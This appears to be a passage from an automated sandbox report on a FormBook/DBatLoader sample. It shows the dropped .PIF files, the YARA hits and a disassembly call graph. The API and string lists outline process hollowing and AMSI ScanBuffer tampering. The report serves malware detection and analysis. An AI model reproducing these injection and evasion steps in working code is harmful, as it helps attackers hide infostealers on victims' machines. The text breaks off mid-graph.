                                                                File size:175'800 bytes
                                                                MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1878165557.000000002CC40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 3%, ReversingLabs
                                                                Reputation:moderate
                                                                Has exited:true

                                                                General

                                                                Target ID:8
                                                                Start time:05:29:02
                                                                Start date:24/12/2024
                                                                Path:C:\Users\Public\Libraries\Csswqtmk.PIF
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\Public\Libraries\Csswqtmk.PIF"
                                                                Imagebase:0x400000
                                                                File size:1'525'248 bytes
                                                                MD5 hash:AACA1B72E0AC5DC118B0F981667E8179
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:Borland Delphi
                                                                Antivirus matches:
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 66%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:10
                                                                Start time:05:29:04
                                                                Start date:24/12/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                Imagebase:0xc30000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:11
                                                                Start time:05:29:04
                                                                Start date:24/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff68cce0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:12
                                                                Start time:05:29:04
                                                                Start date:24/12/2024
                                                                Path:C:\Users\Public\Libraries\kmtqwssC.pif
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\Public\Libraries\kmtqwssC.pif
                                                                Imagebase:0x400000
                                                                File size:175'800 bytes
                                                                MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2013718675.0000000023100000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.1977379900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000C.00000001.1542389748.0000000001360000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000C.00000002.1977379900.0000000001360000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:true

                                                                General

                                                                Target ID:13
                                                                Start time:05:29:11
                                                                Start date:24/12/2024
                                                                Path:C:\Users\Public\Libraries\Csswqtmk.PIF
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\Public\Libraries\Csswqtmk.PIF"
                                                                Imagebase:0x400000
                                                                File size:1'525'248 bytes
                                                                MD5 hash:AACA1B72E0AC5DC118B0F981667E8179
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:Borland Delphi
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:14
                                                                Start time:05:29:12
                                                                Start date:24/12/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                Imagebase:0xc30000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:15
                                                                Start time:05:29:12
                                                                Start date:24/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff68cce0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:16
                                                                Start time:05:29:12
                                                                Start date:24/12/2024
                                                                Path:C:\Users\Public\Libraries\kmtqwssC.pif
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\Public\Libraries\kmtqwssC.pif
                                                                Imagebase:0x400000
                                                                File size:175'800 bytes
                                                                MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2043784716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2072619441.000000002FE90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000010.00000002.2043784716.0000000001360000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000010.00000001.1672552256.0000000001360000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:15.4%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:10%
                                                                  Total number of Nodes:300
                                                                  Total number of Limit Nodes:21
                                                                  execution_graph 25131 29767c4 25948 295480c 25131->25948 25949 295481d 25948->25949 25950 2954843 25949->25950 25951 295485a 25949->25951 25957 2954b78 25950->25957 25966 2954570 25951->25966 25954 295488b 25955 2954850 25955->25954 25971 2954500 25955->25971 25958 2954b85 25957->25958 25965 2954bb5 25957->25965 25960 2954bae 25958->25960 25963 2954b91 25958->25963 25961 2954570 11 API calls 25960->25961 25961->25965 25962 2954b9f 25962->25955 25977 2952c44 11 API calls 25963->25977 25978 29544ac 25965->25978 25967 2954574 25966->25967 25968 2954598 25966->25968 25991 2952c10 25967->25991 25968->25955 25970 2954581 25970->25955 25972 2954504 25971->25972 25973 2954514 25971->25973 25972->25973 25975 2954570 11 API calls 25972->25975 25974 2954542 25973->25974 25976 2952c2c 11 API calls 25973->25976 25974->25954 25975->25973 25976->25974 25977->25962 25979 29544b2 25978->25979 25981 29544cd 25978->25981 25979->25981 25982 2952c2c 25979->25982 25981->25962 25983 2952c3a 25982->25983 25984 2952c30 25982->25984 25983->25981 25984->25983 25985 2952d19 25984->25985 25989 29564cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 25984->25989 25990 2952ce8 7 API calls 25985->25990 25988 2952d3a 25988->25981 25989->25985 25990->25988 25992 2952c27 25991->25992 25994 2952c14 25991->25994 25992->25970 25993 2952c1e 25993->25970 25994->25993 25995 2952d19 25994->25995 25999 29564cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 25994->25999 26000 2952ce8 7 API calls 25995->26000 25998 2952d3a 25998->25970 25999->25995 26000->25998 26001 297bb44 26004 296ec74 26001->26004 26005 296ec7c 26004->26005 26005->26005 28984 296870c LoadLibraryW 26005->28984 26007 296ec9e 28989 2952ee0 QueryPerformanceCounter 26007->28989 26009 296eca3 26010 296ecad InetIsOffline 26009->26010 26011 296ecb7 26010->26011 26012 296ecc8 26010->26012 26013 2954500 11 API calls 26011->26013 26014 2954500 11 API calls 26012->26014 26015 296ecc6 26013->26015 26014->26015 26016 295480c 11 API calls 26015->26016 26017 296ecf5 26016->26017 26018 296ecfd 26017->26018 28992 2954798 26018->28992 26020 296ed20 26021 296ed28 26020->26021 26022 296ed32 26021->26022 29007 2968824 26022->29007 26025 295480c 11 API calls 26026 296ed59 26025->26026 26027 296ed61 26026->26027 26028 2954798 11 API calls 26027->26028 26029 296ed84 26028->26029 26030 296ed8c 26029->26030 29020 29546a4 26030->29020 29022 29680c8 28984->29022 28986 2968745 29033 2967d00 28986->29033 28990 2952eed 28989->28990 28991 2952ef8 GetTickCount 28989->28991 28990->26009 28991->26009 28993 29547fd 28992->28993 28994 295479c 28992->28994 28995 29547a4 28994->28995 28996 2954500 28994->28996 28995->28993 28998 29547b3 28995->28998 28999 2954500 11 API calls 28995->28999 29000 2954570 11 API calls 28996->29000 29002 2954514 28996->29002 28997 2954542 28997->26020 29001 2954570 11 API calls 28998->29001 28999->28998 29000->29002 29004 29547cd 29001->29004 29002->28997 29003 2952c2c 11 API calls 29002->29003 29003->28997 29005 2954500 11 API calls 29004->29005 29006 29547f9 29005->29006 29006->26020 29008 2968838 29007->29008 29009 2968857 LoadLibraryA 29008->29009 29010 2968867 29009->29010 29011 2968020 17 API calls 29010->29011 29012 296886d 29011->29012 29013 29680c8 15 API calls 29012->29013 29014 2968886 29013->29014 29015 2967d00 18 API calls 29014->29015 29016 29688e5 FreeLibrary 29015->29016 29017 29688fd 29016->29017 29018 29544d0 11 API calls 29017->29018 29019 296890a 29018->29019 29019->26025 29021 29546aa 29020->29021 29023 2954500 11 API calls 29022->29023 29024 29680ed 29023->29024 29047 2967914 29024->29047 29027 2954798 11 API calls 29028 2968107 29027->29028 29029 296810f GetModuleHandleW GetProcAddress GetProcAddress 29028->29029 29030 2968142 29029->29030 29053 29544d0 29030->29053 29034 2954500 11 API calls 29033->29034 29035 2967d25 29034->29035 29036 2967914 12 API calls 29035->29036 29037 2967d32 29036->29037 29038 2954798 11 API calls 29037->29038 29039 2967d42 29038->29039 29058 2968020 29039->29058 29042 29680c8 15 API calls 29043 2967d5b NtWriteVirtualMemory 29042->29043 29044 2967d87 29043->29044 29045 29544d0 11 API calls 29044->29045 29046 2967d94 FreeLibrary 29045->29046 29046->26007 29048 2967925 29047->29048 29049 2954b78 11 API calls 29048->29049 29051 2967935 29049->29051 29050 29679a1 29050->29027 29051->29050 29057 295ba44 CharNextA 29051->29057 29055 29544d6 29053->29055 29054 29544fc 29054->28986 29055->29054 29056 2952c2c 11 API calls 29055->29056 29056->29055 29057->29051 29059 2954500 11 API calls 29058->29059 29060 2968043 29059->29060 29061 2967914 12 API calls 29060->29061 29062 2968050 29061->29062 29063 2968058 GetModuleHandleA 29062->29063 29064 29680c8 15 API calls 29063->29064 29065 2968069 GetModuleHandleA 29064->29065 29066 2968087 29065->29066 29067 29544ac 11 API calls 29066->29067 29068 2967d55 29067->29068 29068->29042 29069 2951c6c 29070 2951d04 29069->29070 29071 2951c7c 29069->29071 29072 2951d0d 29070->29072 29073 2951f58 29070->29073 29074 2951cc0 29071->29074 29075 2951c89 29071->29075 29076 2951d25 29072->29076 29091 2951e24 29072->29091 29079 2951fec 29073->29079 29083 2951fac 29073->29083 29084 2951f68 29073->29084 29077 2951724 10 API calls 29074->29077 29078 2951c94 29075->29078 29117 2951724 29075->29117 29081 2951d2c 29076->29081 29087 2951d48 29076->29087 29093 2951dfc 29076->29093 29100 2951cd7 29077->29100 29080 2951e7c 29086 2951724 10 API calls 29080->29086 29090 2951e95 29080->29090 29088 2951fb2 29083->29088 29094 2951724 10 API calls 29083->29094 29085 2951724 10 API calls 29084->29085 29089 2951f82 29085->29089 29092 2951f2c 29086->29092 29097 2951d79 Sleep 29087->29097 29103 2951d9c 29087->29103 29110 2951a8c 8 API calls 29089->29110 29114 2951fa7 29089->29114 29091->29080 29091->29090 29096 2951e55 Sleep 29091->29096 29092->29090 29109 2951a8c 8 API calls 29092->29109 29095 2951724 10 API calls 29093->29095 29098 2951fc1 29094->29098 29107 2951e05 29095->29107 29096->29080 29101 2951e6f Sleep 29096->29101 29102 2951d91 Sleep 29097->29102 29097->29103 29111 2951a8c 8 API calls 29098->29111 29098->29114 29099 2951ca1 29106 2951cb9 29099->29106 29141 2951a8c 29099->29141 29105 2951a8c 8 API calls 29100->29105 29108 2951cfd 29100->29108 29101->29091 29102->29087 29105->29108 29113 2951a8c 8 API calls 29107->29113 29116 2951e1d 29107->29116 29112 2951f50 29109->29112 29110->29114 29115 2951fe4 29111->29115 29113->29116 29118 295173c 29117->29118 29119 2951968 29117->29119 29128 29517cb Sleep 29118->29128 29131 295174e 29118->29131 29120 2951a80 29119->29120 29121 2951938 29119->29121 29122 2951684 VirtualAlloc 29120->29122 29123 2951a89 29120->29123 29127 2951947 Sleep 29121->29127 29134 2951986 29121->29134 29125 29516bf 29122->29125 29126 29516af 29122->29126 29123->29099 29124 295175d 29124->29099 29125->29099 29158 2951644 29126->29158 29132 295195d Sleep 29127->29132 29127->29134 29128->29131 29133 29517e4 Sleep 29128->29133 29130 295182c 29136 2951838 29130->29136 29164 29515cc 29130->29164 29131->29124 29131->29130 29135 295180a Sleep 29131->29135 29132->29121 29133->29118 29137 29519a4 29134->29137 29138 29515cc VirtualAlloc 29134->29138 29135->29130 29139 2951820 Sleep 29135->29139 29136->29099 29137->29099 29138->29137 29139->29131 29142 2951aa1 29141->29142 29143 2951b6c 29141->29143 29145 2951aa7 29142->29145 29148 2951b13 Sleep 29142->29148 29143->29145 29147 29516e8 29143->29147 29144 2951ab0 29144->29106 29145->29144 29151 2951b4b Sleep 29145->29151 29155 2951b81 29145->29155 29146 2951c66 29146->29106 29147->29146 29149 2951644 2 API calls 29147->29149 29148->29145 29150 2951b2d Sleep 29148->29150 29152 29516f5 VirtualFree 29149->29152 29150->29142 29153 2951b61 Sleep 29151->29153 29151->29155 29154 295170d 29152->29154 29153->29145 29154->29106 29156 2951c00 VirtualFree 29155->29156 29157 2951ba4 29155->29157 29156->29106 29157->29106 29159 2951681 29158->29159 29160 295164d 29158->29160 29159->29125 29160->29159 29161 295164f Sleep 29160->29161 29162 2951664 29161->29162 29162->29159 29163 2951668 Sleep 29162->29163 29163->29160 29168 2951560 29164->29168 29166 29515d4 VirtualAlloc 29167 29515eb 29166->29167 29167->29136 29169 2951500 29168->29169 29169->29166 29170 297c2fc 29180 2956518 29170->29180 29174 297c32a 29185 297bb50 timeSetEvent 29174->29185 29176 297c334 29177 297c342 GetMessageA 29176->29177 29178 297c336 TranslateMessage DispatchMessageA 29177->29178 29179 297c352 29177->29179 29178->29177 29181 2956523 29180->29181 29186 2954168 29181->29186 29184 295427c SysAllocStringLen SysFreeString SysReAllocStringLen 29184->29174 29185->29176 29187 29541ae 29186->29187 29188 2954227 29187->29188 29189 29543b8 29187->29189 29200 2954100 29188->29200 29191 29543e9 29189->29191 29195 29543fa 29189->29195 29205 295432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 29191->29205 29194 29543f3 29194->29195 29196 295443f FreeLibrary 29195->29196 29197 2954463 29195->29197 29196->29195 29198 2954472 ExitProcess 29197->29198 29199 295446c 29197->29199 29199->29198 29201 2954110 29200->29201 29202 2954143 29200->29202 29201->29202 29204 29515cc VirtualAlloc 29201->29204 29206 2955814 29201->29206 29202->29184 29204->29201 29205->29194 29207 2955824 GetModuleFileNameA 29206->29207 29208 2955840 29206->29208 29210 2955a78 GetModuleFileNameA RegOpenKeyExA 29207->29210 29208->29201 29211 2955afb 29210->29211 29212 2955abb RegOpenKeyExA 29210->29212 29228 29558b4 12 API calls 29211->29228 29212->29211 29214 2955ad9 RegOpenKeyExA 29212->29214 29214->29211 29216 2955b84 lstrcpynA GetThreadLocale GetLocaleInfoA 29214->29216 29215 2955b20 RegQueryValueExA 29217 2955b40 RegQueryValueExA 29215->29217 29218 2955b5e RegCloseKey 29215->29218 29219 2955c9e 29216->29219 29220 2955bbb 29216->29220 29217->29218 29218->29208 29219->29208 29220->29219 29222 2955bcb lstrlenA 29220->29222 29223 2955be3 29222->29223 29223->29219 29224 2955c30 29223->29224 29225 2955c08 lstrcpynA LoadLibraryExA 29223->29225 29224->29219 29226 2955c3a lstrcpynA LoadLibraryExA 29224->29226 29225->29224 29226->29219 29227 2955c6c lstrcpynA LoadLibraryExA 29226->29227 29227->29219 29228->29215 29229 2954e88 29230 2954e95 29229->29230 29234 2954e9c 29229->29234 29238 2954bdc SysAllocStringLen 29230->29238 29235 2954bfc 29234->29235 29236 2954c02 SysFreeString 29235->29236 29237 2954c08 29235->29237 29236->29237 29238->29234 29239 2954c48 29240 2954c4c 29239->29240 29241 2954c6f 29239->29241 29242 2954c0c 29240->29242 29245 2954c5f SysReAllocStringLen 29240->29245 29243 2954c20 29242->29243 29244 2954c12 SysFreeString 29242->29244 29244->29243 29245->29241 29246 2954bdc 29245->29246 29247 2954bf8 29246->29247 29248 2954be8 SysAllocStringLen 29246->29248 29248->29246 29248->29247

                                                                  Executed Functions

                                                                  Function 02968BB0 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 6797 2968bb0-2968bb3 6798 2968bb8-2968bbd 6797->6798 6798->6798 6799 2968bbf-2968ca6 call 295493c call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 6798->6799 6830 296a6f7-296a761 call 29544d0 * 2 call 2954c0c call 29544d0 call 29544ac call 29544d0 * 2 6799->6830 6831 2968cac-2968d87 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 6799->6831 6831->6830 6875 2968d8d-29690b5 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 29530d4 * 2 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 2954d8c call 2954d9c call 29685dc 6831->6875 6984 29690b7-2969123 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 6875->6984 6985 2969128-2969449 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 29546a4 * 2 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 2952ee0 call 2952f08 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 GetThreadContext 6875->6985 6984->6985 6985->6830 7093 296944f-29696b2 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 2968254 6985->7093 7166 29699bf-2969a2b call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 7093->7166 7167 29696b8-2969821 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 29684c4 7093->7167 7194 2969a30-2969bb0 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 29679b4 7166->7194 7257 2969823-2969849 call 29679b4 7167->7257 7258 296984b-29698b7 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 7167->7258 7194->6830 7298 2969bb6-2969caf call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 2968ac0 7194->7298 7266 29698bc-29699b3 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 29679b4 7257->7266 7258->7266 7337 29699b8-29699bd 7266->7337 7349 2969d03-296a45b call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 2967d00 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 2967d00 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 SetThreadContext NtResumeThread call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 2952c2c call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 29687a0 * 3 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 7298->7349 7350 2969cb1-2969cfe call 29689b8 call 29689ac 7298->7350 7337->7194 7575 296a460-296a6f2 call 29687a0 * 2 call 295480c call 295494c call 2954798 call 295494c call 29687a0 call 295480c call 295494c call 2954798 call 295494c call 29687a0 * 5 call 295480c call 295494c call 2954798 call 295494c call 29687a0 call 295480c call 295494c call 2954798 call 295494c call 29687a0 call 295480c call 295494c call 2954798 call 295494c call 29687a0 call 295480c call 295494c call 2954798 call 295494c call 29687a0 call 2967ed4 call 29687a0 * 2 7349->7575 7350->7349 7575->6830
                                                                  APIs
                                                                    • Part of subcall function 02968824: LoadLibraryA.KERNEL32(00000000,00000000,0296890B), ref: 02968858
                                                                    • Part of subcall function 02968824: FreeLibrary.KERNEL32(74B30000,00000000,029B1388,Function_000065D8,00000004,029B1398,029B1388,05F5E0FF,00000040,029B139C,74B30000,00000000,00000000,00000000,00000000,0296890B), ref: 029688EB
                                                                    • Part of subcall function 029685DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02968668
                                                                  • GetThreadContext.KERNEL32(00000868,029B1420,ScanString,029B13A4,0296A77C,UacInitialize,029B13A4,0296A77C,ScanBuffer,029B13A4,0296A77C,ScanBuffer,029B13A4,0296A77C,UacInitialize,029B13A4), ref: 02969442
                                                                    • Part of subcall function 02968254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029682C5
                                                                    • Part of subcall function 029684C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02968529
                                                                    • Part of subcall function 029679B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02967A27
                                                                    • Part of subcall function 02967D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02967D74
                                                                  • SetThreadContext.KERNEL32(00000868,029B1420,ScanBuffer,029B13A4,0296A77C,ScanString,029B13A4,0296A77C,Initialize,029B13A4,0296A77C,00000878,002A9FF8,029B14F8,00000004,029B14FC), ref: 0296A157
                                                                  • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000868,00000000,00000868,029B1420,ScanBuffer,029B13A4,0296A77C,ScanString,029B13A4,0296A77C,Initialize,029B13A4,0296A77C,00000878,002A9FF8,029B14F8), ref: 0296A164
                                                                    • Part of subcall function 029687A0: LoadLibraryW.KERNEL32(bcrypt,?,00000868,00000000,029B13A4,0296A3C7,ScanString,029B13A4,0296A77C,ScanBuffer,029B13A4,0296A77C,Initialize,029B13A4,0296A77C,UacScan), ref: 029687B4
                                                                    • Part of subcall function 029687A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029687CE
                                                                    • Part of subcall function 029687A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000868,00000000,029B13A4,0296A3C7,ScanString,029B13A4,0296A77C,ScanBuffer,029B13A4,0296A77C,Initialize), ref: 0296880A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Library$MemoryThreadVirtual$ContextFreeLoad$AddressAllocateCreateProcProcessReadResumeSectionUnmapUserViewWrite
                                                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                  • API String ID: 1022112746-51457883
                                                                  • Opcode ID: 461b6d445559a60f93a7eedf38c854a9ec981dda309b3fab1994f245f5031e8d
                                                                  • Instruction ID: be8bf03b97b98f0c3f00edc8f5ecc4997dd784b6da9158a1846383d1fe309565
                                                                  • Opcode Fuzzy Hash: 461b6d445559a60f93a7eedf38c854a9ec981dda309b3fab1994f245f5031e8d
                                                                  • Instruction Fuzzy Hash: 57E20F35B502289BDB51EF64CDA5BEE73FABFC8710F1050A1D509AB254DA30EE858F90
                                                                  Function 02968BAE Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 7653 2968bae-2968bb3 7655 2968bb8-2968bbd 7653->7655 7655->7655 7656 2968bbf-2968ca6 call 295493c call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 7655->7656 7687 296a6f7-296a761 call 29544d0 * 2 call 2954c0c call 29544d0 call 29544ac call 29544d0 * 2 7656->7687 7688 2968cac-2968d87 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 7656->7688 7688->7687 7732 2968d8d-29690b5 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 29530d4 * 2 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 call 295480c call 295494c call 29546a4 call 2954798 call 295494c call 29546a4 call 2968824 